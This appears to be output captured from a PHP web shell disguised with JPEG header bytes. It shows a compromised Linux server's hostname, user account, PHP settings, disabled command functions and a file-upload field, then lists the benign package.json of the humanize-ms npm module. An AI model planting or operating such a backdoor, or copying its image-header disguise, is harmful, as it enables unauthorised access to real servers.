ÿØÿà JFIF ` ` ÿþ
|
Server : Apache System : Linux cloud.heroica.com.br 4.18.0-553.36.1.el8_10.x86_64 #1 SMP Wed Jan 22 03:07:54 EST 2025 x86_64 User : farolpborg ( 1053) PHP Version : 7.4.33 Disable Function : exec,passthru,shell_exec,system Directory : /proc/self/root/usr/lib/node_modules/npm/node_modules/humanize-ms/ |
Upload File : |
{
"name": "humanize-ms",
"version": "1.2.1",
"description": "transform humanize time to ms",
"main": "index.js",
"files": [
"index.js"
],
"scripts": {
"test": "make test"
},
"keywords": [
"humanize",
"ms"
],
"author": {
"name": "dead-horse",
"email": "dead_horse@qq.com",
"url": "http://deadhorse.me"
},
"repository": {
"type": "git",
"url": "https://github.com/node-modules/humanize-ms"
},
"license": "MIT",
"dependencies": {
"ms": "^2.0.0"
},
"devDependencies": {
"autod": "*",
"beautify-benchmark": "~0.2.4",
"benchmark": "~1.0.0",
"istanbul": "*",
"mocha": "*",
"should": "*"
}
}